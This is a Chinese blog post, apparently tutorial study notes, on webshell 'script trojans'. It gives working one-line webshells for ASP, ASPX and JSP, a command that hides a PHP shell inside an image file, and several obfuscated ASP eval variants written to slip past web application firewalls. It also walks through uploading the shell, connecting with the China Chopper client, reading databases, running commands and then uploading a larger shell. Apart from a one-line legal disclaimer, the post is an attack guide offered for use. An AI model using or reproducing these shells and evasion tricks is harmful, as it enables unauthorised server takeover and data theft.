某教程学习笔记(一):13、脚本木马原理

简介: 某教程学习笔记(一):13、脚本木马原理


一、一句话木马,隐蔽性强,功能强大,为上传大马做准备


1、php一句话


将一句话上传到服务器

0a2653c851af460fa595bd959398a8f1.png

用菜刀连接


0eacb84100b54626af849e6b562bf92a.png2d65d23f6d4748949b924e4057485923.png


读取数据库

2e9b90b2ca334476abebe75bafe6eeaa.png

终端运行命令

0a2653c851af460fa595bd959398a8f1.png

2、asp一句话


<% eval request(“aiyou”) %>


3、aspx一句话


<%@ Page Language=“Jscript”%>


<%eval(Request.Item[“value”],“unsafe”);%>


4、jsp一句话


<% if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>


5、图片马


cmd下做一句话


copy /b1.jpg+1.php 2.jpg

0eacb84100b54626af849e6b562bf92a.png

C32ASM做一句话

2d65d23f6d4748949b924e4057485923.png

二、一句话变形,waf会拦截一句话,可以通过变形绕过


<%eval(request(chr(112)))%>


<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))(“aiyou”))%>


<%eval""&(“e”&“v”&“a”&“l”&"("&“r”&“e”&“q”&“u”&“e”&“s”&“t”&"("&“0”&"-"&“2”&-"&“5”&")"&")")%>


<%a=request(“aiyou”)%><%eval a%>


三、大马,功能比小马的功能更加强大


上传小马后用菜刀连接,然后再通过菜刀上传大马

0a2653c851af460fa595bd959398a8f1.png

禁止非法,后果自负


目录
相关文章
|
开发工具 C语言 数据安全/隐私保护
免杀工具 -- FourEye
免杀工具 -- FourEye
794 0
免杀工具 -- FourEye
|
3月前
|
安全 Shell PHP
一篇文章讲明白Kali学习笔记30:身份认证与命令执行漏洞
一篇文章讲明白Kali学习笔记30:身份认证与命令执行漏洞
17 0
|
4月前
|
监控 安全 网络安全
火绒安全的用法
火绒安全的用法
|
11月前
|
安全 小程序 Windows
[笔记]攻防工具分享之 CobaltStrike框架 《二》生成后门
[笔记]攻防工具分享之 CobaltStrike框架 《二》生成后门
183 0
|
11月前
|
Java 数据安全/隐私保护
[笔记]攻防工具分享之 CobaltStrike框架 《一》环境配置
[笔记]攻防工具分享之 CobaltStrike框架 《一》环境配置
111 0
|
4月前
|
开发框架 Java .NET
32、webshell简介
32、webshell简介
32 0
|
12月前
|
安全 关系型数据库 MySQL
黑吃黑Getshell到提权实战案例
黑吃黑Getshell到提权实战案例
302 0
|
12月前
|
运维 关系型数据库 MySQL
绕过360安全卫士提权实战案例
绕过360安全卫士提权实战案例
344 1
|
12月前
|
开发框架 安全 .NET
冰蝎WebShell免杀工具(支持4.0.6)
冰蝎WebShell免杀工具(支持4.0.6)
519 0
|
Windows
pikachu靶场通关秘籍之命令执行攻击
pikachu靶场通关秘籍之命令执行攻击
121 0